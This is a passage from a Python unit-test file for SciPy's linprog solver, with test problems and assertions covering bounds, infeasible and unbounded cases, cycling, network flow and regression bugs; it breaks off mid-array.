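# Illustrative note (added sketch, not part of the original tests): for n = 3
# the magic constant is M = 15 and magic_square(3) returns A with shape
# (2*n**2 + 2*n + 2, n**4) = (26, 81): 9 "use each number once" rows,
# 9 "one number per cell" rows, 3 row-sum rows, 3 column-sum rows and
# 2 diagonal rows over 81 binary decision variables.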
def lpgen_2d(m, n):
""" -> A b c LP test: m*n vars, m+n constraints
row sums == n/m, col sums == 1
https://gist.github.com/denis-bz/8647461
"""
np.random.seed(0)
c = - np.random.exponential(size=(m, n))
Arow = np.zeros((m, m * n))
brow = np.zeros(m)
for j in range(m):
j1 = j + 1
Arow[j, j * n:j1 * n] = 1
brow[j] = n / m
Acol = np.zeros((n, m * n))
bcol = np.zeros(n)
for j in range(n):
j1 = j + 1
Acol[j, j::n] = 1
bcol[j] = 1
A = np.vstack((Arow, Acol))
b = np.hstack((brow, bcol))
return A, b, c.ravel()
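# Illustrative note (added sketch, not part of the original tests): the call
# lpgen_2d(20, 20) used by test_disp below gives 400 variables and 40
# constraints (20 row-sum rows with right-hand side n/m = 1 and 20 column-sum
# rows with right-hand side 1); the seeded instance has an optimum of about
# -64.0495.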
def nontrivial_problem():
c = [-1, 8, 4, -6]
A_ub = [[-7, -7, 6, 9],
[1, -1, -3, 0],
[10, -10, -7, 7],
[6, -1, 3, 4]]
b_ub = [-3, 6, -6, 6]
A_eq = [[-10, 1, 1, -8]]
b_eq = [-4]
x_star = [101 / 1391, 1462 / 1391, 0, 752 / 1391]
f_star = 7083 / 1391
return c, A_ub, b_ub, A_eq, b_eq, x_star, f_star
def generic_callback_test(self):
# Check that callback is as advertised
last_cb = {}
def cb(res):
message = res.pop('message')
complete = res.pop('complete')
assert_(res.pop('phase') in (1, 2))
assert_(res.pop('status') in range(4))
assert_(isinstance(res.pop('nit'), int))
assert_(isinstance(complete, bool))
assert_(isinstance(message, str))
last_cb['x'] = res['x']
last_cb['fun'] = res['fun']
last_cb['slack'] = res['slack']
last_cb['con'] = res['con']
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
res = linprog(c, A_ub=A_ub, b_ub=b_ub, callback=cb, method=self.method)
_assert_success(res, desired_fun=-18.0, desired_x=[2, 6])
assert_allclose(last_cb['fun'], res['fun'])
assert_allclose(last_cb['x'], res['x'])
assert_allclose(last_cb['con'], res['con'])
assert_allclose(last_cb['slack'], res['slack'])
def test_unknown_solver():
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
assert_raises(ValueError, linprog,
c, A_ub=A_ub, b_ub=b_ub, method='ekki-ekki-ekki')
A_ub = None
b_ub = None
A_eq = None
b_eq = None
bounds = None
################
# Common Tests #
################
class LinprogCommonTests(object):
"""
Base class for `linprog` tests. Generally, each test will be performed
once for every derived class of LinprogCommonTests, each of which will
typically change self.options and/or self.method. Effectively, these tests
    are run for many combinations of method (simplex, revised simplex, and
interior point) and options (such as pivoting rule or sparse treatment).
"""
##################
# Targeted Tests #
##################
def test_callback(self):
generic_callback_test(self)
def test_disp(self):
# test that display option does not break anything.
A, b, c = lpgen_2d(20, 20)
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"disp": True})
_assert_success(res, desired_fun=-64.049494229)
def test_docstring_example(self):
# Example from linprog docstring.
c = [-1, 4]
A = [[-3, 1], [1, 2]]
b = [6, 4]
x0_bounds = (None, None)
x1_bounds = (-3, None)
res = linprog(c, A_ub=A, b_ub=b, bounds=(x0_bounds, x1_bounds),
options=self.options, method=self.method)
_assert_success(res, desired_fun=-22)
def test_type_error(self):
# (presumably) checks that linprog recognizes type errors
# This is tested more carefully in test__linprog_clean_inputs.py
c = [1]
A_eq = [[1]]
b_eq = "hello"
assert_raises(TypeError, linprog,
c, A_eq=A_eq, b_eq=b_eq,
method=self.method, options=self.options)
def test_aliasing_b_ub(self):
# (presumably) checks that linprog does not modify b_ub
# This is tested more carefully in test__linprog_clean_inputs.py
c = np.array([1.0])
A_ub = np.array([[1.0]])
b_ub_orig = np.array([3.0])
b_ub = b_ub_orig.copy()
bounds = (-4.0, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-4, desired_x=[-4])
assert_allclose(b_ub_orig, b_ub)
def test_aliasing_b_eq(self):
# (presumably) checks that linprog does not modify b_eq
# This is tested more carefully in test__linprog_clean_inputs.py
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq_orig = np.array([3.0])
b_eq = b_eq_orig.copy()
bounds = (-4.0, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
assert_allclose(b_eq_orig, b_eq)
def test_non_ndarray_args(self):
# (presumably) checks that linprog accepts list in place of arrays
# This is tested more carefully in test__linprog_clean_inputs.py
c = [1.0]
A_ub = [[1.0]]
b_ub = [3.0]
A_eq = [[1.0]]
b_eq = [2.0]
bounds = (-1.0, 10.0)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=2, desired_x=[2])
def test_unknown_options(self):
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
def f(c, A_ub=None, b_ub=None, A_eq=None,
b_eq=None, bounds=None, options={}):
linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=options)
o = {key: self.options[key] for key in self.options}
o['spam'] = 42
_assert_warns(OptimizeWarning, f,
c, A_ub=A_ub, b_ub=b_ub, options=o)
def test_invalid_inputs(self):
def f(c, A_ub=None, b_ub=None, A_eq=None, b_eq=None, bounds=None):
linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
for bad_bound in [[(5, 0), (1, 2), (3, 4)],
[(1, 2), (3, 4)],
[(1, 2), (3, 4), (3, 4, 5)],
[(1, 2), (np.inf, np.inf), (3, 4)],
[(1, 2), (-np.inf, -np.inf), (3, 4)],
]:
assert_raises(ValueError, f, [1, 2, 3], bounds=bad_bound)
assert_raises(ValueError, f, [1, 2], A_ub=[[1, 2]], b_ub=[1, 2])
assert_raises(ValueError, f, [1, 2], A_ub=[[1]], b_ub=[1])
assert_raises(ValueError, f, [1, 2], A_eq=[[1, 2]], b_eq=[1, 2])
assert_raises(ValueError, f, [1, 2], A_eq=[[1]], b_eq=[1])
assert_raises(ValueError, f, [1, 2], A_eq=[1], b_eq=1)
# this last check doesn't make sense for sparse presolve
if ("_sparse_presolve" in self.options and
self.options["_sparse_presolve"]):
return
# there aren't 3D sparse matrices
assert_raises(ValueError, f, [1, 2], A_ub=np.zeros((1, 1, 3)), b_eq=1)
def test_empty_constraint_1(self):
c = [-1, -2]
res = linprog(c, method=self.method, options=self.options)
_assert_unbounded(res)
def test_empty_constraint_2(self):
c = [-1, 1, -1, 1]
bounds = [(0, np.inf), (-np.inf, 0), (-1, 1), (-1, 1)]
res = linprog(c, bounds=bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
# Unboundedness detected in presolve requires no iterations
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_empty_constraint_3(self):
c = [1, -1, 1, -1]
bounds = [(0, np.inf), (-np.inf, 0), (-1, 1), (-1, 1)]
res = linprog(c, bounds=bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 0, -1, 1], desired_fun=-2)
def test_inequality_constraints(self):
# Minimize linear function subject to linear inequality constraints.
# http://www.dam.brown.edu/people/huiwang/classes/am121/Archive/simplex_121_c.pdf
c = np.array([3, 2]) * -1 # maximize
A_ub = [[2, 1],
[1, 1],
[1, 0]]
b_ub = [10, 8, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-18, desired_x=[2, 6])
def test_inequality_constraints2(self):
# Minimize linear function subject to linear inequality constraints.
# http://www.statslab.cam.ac.uk/~ff271/teaching/opt/notes/notes8.pdf
# (dead link)
c = [6, 3]
A_ub = [[0, 3],
[-1, -1],
[-2, 1]]
b_ub = [2, -1, -1]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=5, desired_x=[2 / 3, 1 / 3])
def test_bounds_simple(self):
c = [1, 2]
bounds = (1, 2)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[1, 1])
bounds = [(1, 2), (1, 2)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[1, 1])
def test_bounded_below_only_1(self):
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq = np.array([3.0])
bounds = (1.0, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
def test_bounded_below_only_2(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (0.5, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounded_above_only_1(self):
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq = np.array([3.0])
bounds = (None, 10.0)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
def test_bounded_above_only_2(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (-np.inf, 4)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounds_infinity(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (-np.inf, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounds_mixed(self):
# Problem has one unbounded variable and
# another with a negative lower bound.
c = np.array([-1, 4]) * -1 # maximize
A_ub = np.array([[-3, 1],
[1, 2]], dtype=np.float64)
b_ub = [6, 4]
x0_bounds = (-np.inf, np.inf)
x1_bounds = (-3, np.inf)
bounds = (x0_bounds, x1_bounds)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-80 / 7, desired_x=[-8 / 7, 18 / 7])
def test_bounds_equal_but_infeasible(self):
c = [-4, 1]
A_ub = [[7, -2], [0, 1], [2, -2]]
b_ub = [14, 0, 3]
bounds = [(2, 2), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bounds_equal_but_infeasible2(self):
c = [-4, 1]
A_eq = [[7, -2], [0, 1], [2, -2]]
b_eq = [14, 0, 3]
bounds = [(2, 2), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bounds_equal_no_presolve(self):
# There was a bug when a lower and upper bound were equal but
# presolve was not on to eliminate the variable. The bound
# was being converted to an equality constraint, but the bound
# was not eliminated, leading to issues in postprocessing.
c = [1, 2]
A_ub = [[1, 2], [1.1, 2.2]]
b_ub = [4, 8]
bounds = [(1, 2), (2, 2)]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_infeasible(res)
def test_zero_column_1(self):
m, n = 3, 4
np.random.seed(0)
c = np.random.rand(n)
c[1] = 1
A_eq = np.random.rand(m, n)
A_eq[:, 1] = 0
b_eq = np.random.rand(m)
A_ub = [[1, 0, 1, 1]]
b_ub = 3
bounds = [(-10, 10), (-10, 10), (-10, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-9.7087836730413404)
def test_zero_column_2(self):
np.random.seed(0)
m, n = 2, 4
c = np.random.rand(n)
c[1] = -1
A_eq = np.random.rand(m, n)
A_eq[:, 1] = 0
b_eq = np.random.rand(m)
A_ub = np.random.rand(m, n)
A_ub[:, 1] = 0
b_ub = np.random.rand(m)
bounds = (None, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
# Unboundedness detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_zero_row_1(self):
c = [1, 2, 3]
A_eq = [[0, 0, 0], [1, 1, 1], [0, 0, 0]]
b_eq = [0, 3, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3)
def test_zero_row_2(self):
A_ub = [[0, 0, 0], [1, 1, 1], [0, 0, 0]]
b_ub = [0, 3, 0]
c = [1, 2, 3]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0)
def test_zero_row_3(self):
m, n = 2, 4
c = np.random.rand(n)
A_eq = np.random.rand(m, n)
A_eq[0, :] = 0
b_eq = np.random.rand(m)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_zero_row_4(self):
m, n = 2, 4
c = np.random.rand(n)
A_ub = np.random.rand(m, n)
A_ub[0, :] = 0
b_ub = -np.random.rand(m)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_eq_1(self):
c = [1, 1, 1, 2]
A_eq = [[1, 0, 0, 0], [0, 2, 0, 0], [1, 0, 0, 0], [1, 1, 1, 1]]
b_eq = [1, 2, 2, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_eq_2(self):
c = [1, 1, 1, 2]
A_eq = [[1, 0, 0, 0], [0, 2, 0, 0], [1, 0, 0, 0], [1, 1, 1, 1]]
b_eq = [1, 2, 1, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=4)
def test_singleton_row_ub_1(self):
c = [1, 1, 1, 2]
A_ub = [[1, 0, 0, 0], [0, 2, 0, 0], [-1, 0, 0, 0], [1, 1, 1, 1]]
b_ub = [1, 2, -2, 4]
bounds = [(None, None), (0, None), (0, None), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_ub_2(self):
c = [1, 1, 1, 2]
A_ub = [[1, 0, 0, 0], [0, 2, 0, 0], [-1, 0, 0, 0], [1, 1, 1, 1]]
b_ub = [1, 2, -0.5, 4]
bounds = [(None, None), (0, None), (0, None), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0.5)
def test_infeasible(self):
# Test linprog response to an infeasible problem
c = [-1, -1]
A_ub = [[1, 0],
[0, 1],
[-1, -1]]
b_ub = [2, 2, -5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_infeasible_inequality_bounds(self):
c = [1]
A_ub = [[2]]
b_ub = 4
bounds = (5, 6)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_unbounded(self):
# Test linprog response to an unbounded problem
c = np.array([1, 1]) * -1 # maximize
A_ub = [[-1, 1],
[-1, -1]]
b_ub = [-1, -2]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
def test_unbounded_below_no_presolve_corrected(self):
c = [1]
bounds = [(None, 1)]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c=c, bounds=bounds,
method=self.method,
options=o)
if self.method == "revised simplex":
# Revised simplex has a special pathway for no constraints.
assert_equal(res.status, 5)
else:
_assert_unbounded(res)
def test_unbounded_no_nontrivial_constraints_1(self):
"""
Test whether presolve pathway for detecting unboundedness after
constraint elimination is working.
"""
c = np.array([0, 0, 0, 1, -1, -1])
A_ub = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, -1]])
b_ub = np.array([2, -2, 0])
bounds = [(None, None), (None, None), (None, None),
(-1, 1), (-1, 1), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
assert_equal(res.x[-1], np.inf)
assert_equal(res.message[:36], "The problem is (trivially) unbounded")
def test_unbounded_no_nontrivial_constraints_2(self):
"""
Test whether presolve pathway for detecting unboundedness after
constraint elimination is working.
"""
c = np.array([0, 0, 0, 1, -1, 1])
A_ub = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1]])
b_ub = np.array([2, -2, 0])
bounds = [(None, None), (None, None), (None, None),
(-1, 1), (-1, 1), (None, 0)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
assert_equal(res.x[-1], -np.inf)
assert_equal(res.message[:36], "The problem is (trivially) unbounded")
def test_cyclic_recovery(self):
        # Test linprog's recovery from cycling using the Klee-Minty problem
# Klee-Minty https://www.math.ubc.ca/~israel/m340/kleemin3.pdf
c = np.array([100, 10, 1]) * -1 # maximize
A_ub = [[1, 0, 0],
[20, 1, 0],
[200, 20, 1]]
b_ub = [1, 100, 10000]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 0, 10000], atol=5e-6, rtol=1e-7)
def test_cyclic_bland(self):
# Test the effect of Bland's rule on a cycling problem
c = np.array([-10, 57, 9, 24.])
A_ub = np.array([[0.5, -5.5, -2.5, 9],
[0.5, -1.5, -0.5, 1],
[1, 0, 0, 0]])
b_ub = [0, 0, 1]
# copy the existing options dictionary but change maxiter
maxiter = 100
o = {key: val for key, val in self.options.items()}
o['maxiter'] = maxiter
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
if self.method == 'simplex' and not self.options.get('bland'):
# simplex cycles without Bland's rule
_assert_iteration_limit_reached(res, o['maxiter'])
else:
# other methods, including simplex with Bland's rule, succeed
_assert_success(res, desired_x=[1, 0, 1, 0])
# note that revised simplex skips this test because it may or may not
# cycle depending on the initial basis
def test_remove_redundancy_infeasibility(self):
# mostly a test of redundancy removal, which is carefully tested in
# test__remove_redundancy.py
m, n = 10, 10
c = np.random.rand(n)
A_eq = np.random.rand(m, n)
b_eq = np.random.rand(m)
A_eq[-1, :] = 2 * A_eq[-2, :]
b_eq[-1] *= -1
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
#################
# General Tests #
#################
def test_nontrivial_problem(self):
# Problem involves all constraint types,
# negative resource limits, and rounding issues.
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
def test_lpgen_problem(self):
# Test linprog with a rather large problem (400 variables,
# 40 constraints) generated by https://gist.github.com/denis-bz/8647461
A_ub, b_ub, c = lpgen_2d(20, 20)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-64.049494229)
def test_network_flow(self):
# A network flow problem with supply and demand at nodes
# and with costs along directed edges.
# https://www.princeton.edu/~rvdb/542/lectures/lec10.pdf
c = [2, 4, 9, 11, 4, 3, 8, 7, 0, 15, 16, 18]
n, p = -1, 1
A_eq = [
[n, n, p, 0, p, 0, 0, 0, 0, p, 0, 0],
[p, 0, 0, p, 0, p, 0, 0, 0, 0, 0, 0],
[0, 0, n, n, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, p, p, 0, 0, p, 0],
[0, 0, 0, 0, n, n, n, 0, p, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, n, n, 0, 0, p],
[0, 0, 0, 0, 0, 0, 0, 0, 0, n, n, n]]
b_eq = [0, 19, -16, 33, 0, 0, -36]
with suppress_warnings() as sup:
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=755, atol=1e-6, rtol=1e-7)
def test_network_flow_limited_capacity(self):
# A network flow problem with supply and demand at nodes
# and with costs and capacities along directed edges.
# http://blog.sommer-forst.de/2013/04/10/
c = [2, 2, 1, 3, 1]
bounds = [
[0, 4],
[0, 2],
[0, 2],
[0, 3],
[0, 5]]
n, p = -1, 1
A_eq = [
[n, n, 0, 0, 0],
[p, 0, n, n, 0],
[0, p, p, 0, n],
[0, 0, 0, p, p]]
b_eq = [-4, 0, 0, 4]
with suppress_warnings() as sup:
# this is an UmfpackWarning but I had trouble importing it
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(OptimizeWarning, "Solving system with option...")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=14)
def test_simplex_algorithm_wikipedia_example(self):
# https://en.wikipedia.org/wiki/Simplex_algorithm#Example
c = [-2, -3, -4]
A_ub = [
[3, 2, 1],
[2, 5, 3]]
b_ub = [10, 15]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-20)
def test_enzo_example(self):
# https://github.com/scipy/scipy/issues/1779 lp2.py
#
# Translated from Octave code at:
# http://www.ecs.shimane-u.ac.jp/~kyoshida/lpeng.htm
# and placed under MIT licence by Enzo Michelangeli
# with permission explicitly granted by the original author,
# Prof. Kazunobu Yoshida
c = [4, 8, 3, 0, 0, 0]
A_eq = [
[2, 5, 3, -1, 0, 0],
[3, 2.5, 8, 0, -1, 0],
[8, 10, 4, 0, 0, -1]]
b_eq = [185, 155, 600]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=317.5,
desired_x=[66.25, 0, 17.5, 0, 183.75, 0],
atol=6e-6, rtol=1e-7)
def test_enzo_example_b(self):
# rescued from https://github.com/scipy/scipy/pull/218
c = [2.8, 6.3, 10.8, -2.8, -6.3, -10.8]
A_eq = [[-1, -1, -1, 0, 0, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 1]]
b_eq = [-0.5, 0.4, 0.3, 0.3, 0.3]
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-1.77,
desired_x=[0.3, 0.2, 0.0, 0.0, 0.1, 0.3])
def test_enzo_example_c_with_degeneracy(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 20
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(1, m + 1) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [0, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0, desired_x=np.zeros(m))
def test_enzo_example_c_with_unboundedness(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 50
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(m) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [0, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
def test_enzo_example_c_with_infeasibility(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 50
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(m) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [1, 1]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_infeasible(res)
def test_basic_artificial_vars(self):
# Problem is chosen to test two phase simplex methods when at the end
# of phase 1 some artificial variables remain in the basis.
# Also, for `method='simplex'`, the row in the tableau corresponding
# with the artificial variables is not all zero.
c = np.array([-0.1, -0.07, 0.004, 0.004, 0.004, 0.004])
A_ub = np.array([[1.0, 0, 0, 0, 0, 0], [-1.0, 0, 0, 0, 0, 0],
[0, -1.0, 0, 0, 0, 0], [0, 1.0, 0, 0, 0, 0],
[1.0, 1.0, 0, 0, 0, 0]])
b_ub = np.array([3.0, 3.0, 3.0, 3.0, 20.0])
A_eq = np.array([[1.0, 0, -1, 1, -1, 1], [0, -1.0, -1, 1, -1, 1]])
b_eq = np.array([0, 0])
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0, desired_x=np.zeros_like(c),
atol=2e-6)
#################
# Bug Fix Tests #
#################
def test_bug_5400(self):
# https://github.com/scipy/scipy/issues/5400
bounds = [
(0, None),
(0, 100), (0, 100), (0, 100), (0, 100), (0, 100), (0, 100),
(0, 900), (0, 900), (0, 900), (0, 900), (0, 900), (0, 900),
(0, None), (0, None), (0, None), (0, None), (0, None), (0, None)]
f = 1 / 9
g = -1e4
h = -3.1
A_ub = np.array([
[1, -2.99, 0, 0, -3, 0, 0, 0, -1, -1, 0, -1, -1, 1, 1, 0, 0, 0, 0],
[1, 0, -2.9, h, 0, -3, 0, -1, 0, 0, -1, 0, -1, 0, 0, 1, 1, 0, 0],
[1, 0, 0, h, 0, 0, -3, -1, -1, 0, -1, -1, 0, 0, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1],
[0, 1.99, -1, -1, 0, 0, 0, -1, f, f, 0, 0, 0, g, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 2, -1, -1, 0, 0, 0, -1, f, f, 0, g, 0, 0, 0, 0],
[0, -1, 1.9, 2.1, 0, 0, 0, f, -1, -1, 0, 0, 0, 0, 0, g, 0, 0, 0],
[0, 0, 0, 0, -1, 2, -1, 0, 0, 0, f, -1, f, 0, 0, 0, g, 0, 0],
